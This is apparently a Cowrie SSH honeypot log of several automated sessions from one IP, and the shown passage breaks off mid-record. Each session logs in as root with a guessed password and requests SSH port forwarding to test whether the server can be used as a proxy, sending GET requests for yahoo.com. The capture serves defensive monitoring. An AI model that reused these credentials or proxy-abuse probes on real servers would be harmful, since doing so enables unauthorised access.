{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19238,"dst_ip":"1.2.3.4","dst_port":22,"session":"81d7308791e1","protocol":"ssh","message":"New connection: 213.209.150.239:19238 (1.2.3.4:22) [session: 81d7308791e1]","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.445375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.446000Z","src_ip":"213.209.150.239","session":"81d7308791e1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.502700Z","src_ip":"213.209.150.239","session":"81d7308791e1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.785041Z","src_ip":"213.209.150.239","session":"81d7308791e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":840,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:840","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.842623Z","session":"81d7308791e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:38.899263Z","src_ip":"213.209.150.239","session":"81d7308791e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14995,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14995","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.055073Z","session":"81d7308791e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.111797Z","src_ip":"213.209.150.239","session":"81d7308791e1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.169078Z","src_ip":"213.209.150.239","session":"81d7308791e1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19293,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce6feaaedb3b","protocol":"ssh","message":"New connection: 213.209.150.239:19293 (1.2.3.4:22) [session: ce6feaaedb3b]","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.215571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.216619Z","src_ip":"213.209.150.239","session":"ce6feaaedb3b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.263764Z","src_ip":"213.209.150.239","session":"ce6feaaedb3b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.498656Z","src_ip":"213.209.150.239","session":"ce6feaaedb3b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28007,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28007","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.547372Z","session":"ce6feaaedb3b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.594884Z","src_ip":"213.209.150.239","session":"ce6feaaedb3b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":5650,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5650","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.729610Z","session":"ce6feaaedb3b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.776961Z","src_ip":"213.209.150.239","session":"ce6feaaedb3b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.824854Z","src_ip":"213.209.150.239","session":"ce6feaaedb3b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19335,"dst_ip":"1.2.3.4","dst_port":22,"session":"96d87031d048","protocol":"ssh","message":"New connection: 213.209.150.239:19335 (1.2.3.4:22) [session: 96d87031d048]","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.880598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.881824Z","src_ip":"213.209.150.239","session":"96d87031d048"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:39.938467Z","src_ip":"213.209.150.239","session":"96d87031d048"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.220814Z","src_ip":"213.209.150.239","session":"96d87031d048"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":5507,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5507","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.278906Z","session":"96d87031d048"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.335811Z","src_ip":"213.209.150.239","session":"96d87031d048"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":10748,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:10748","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.491026Z","session":"96d87031d048"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.547728Z","src_ip":"213.209.150.239","session":"96d87031d048"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.605226Z","src_ip":"213.209.150.239","session":"96d87031d048"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19394,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9cfbeef8d4d","protocol":"ssh","message":"New connection: 213.209.150.239:19394 (1.2.3.4:22) [session: c9cfbeef8d4d]","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.651456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.652529Z","src_ip":"213.209.150.239","session":"c9cfbeef8d4d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.699748Z","src_ip":"213.209.150.239","session":"c9cfbeef8d4d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.934984Z","src_ip":"213.209.150.239","session":"c9cfbeef8d4d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":10307,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:10307","sensor":"my-vps","timestamp":"2025-08-26T01:01:40.983149Z","session":"c9cfbeef8d4d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.030418Z","src_ip":"213.209.150.239","session":"c9cfbeef8d4d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":29530,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29530","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.165473Z","session":"c9cfbeef8d4d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.212501Z","src_ip":"213.209.150.239","session":"c9cfbeef8d4d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.261090Z","src_ip":"213.209.150.239","session":"c9cfbeef8d4d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19440,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c54423b704b","protocol":"ssh","message":"New connection: 213.209.150.239:19440 (1.2.3.4:22) [session: 3c54423b704b]","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.316650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.317567Z","src_ip":"213.209.150.239","session":"3c54423b704b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.374068Z","src_ip":"213.209.150.239","session":"3c54423b704b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.656632Z","src_ip":"213.209.150.239","session":"3c54423b704b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":20236,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20236","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.714165Z","session":"3c54423b704b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.771020Z","src_ip":"213.209.150.239","session":"3c54423b704b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":19409,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19409","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.927235Z","session":"3c54423b704b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:41.983975Z","src_ip":"213.209.150.239","session":"3c54423b704b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.042004Z","src_ip":"213.209.150.239","session":"3c54423b704b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19501,"dst_ip":"1.2.3.4","dst_port":22,"session":"df8421e5702b","protocol":"ssh","message":"New connection: 213.209.150.239:19501 (1.2.3.4:22) [session: df8421e5702b]","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.097557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.098314Z","src_ip":"213.209.150.239","session":"df8421e5702b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr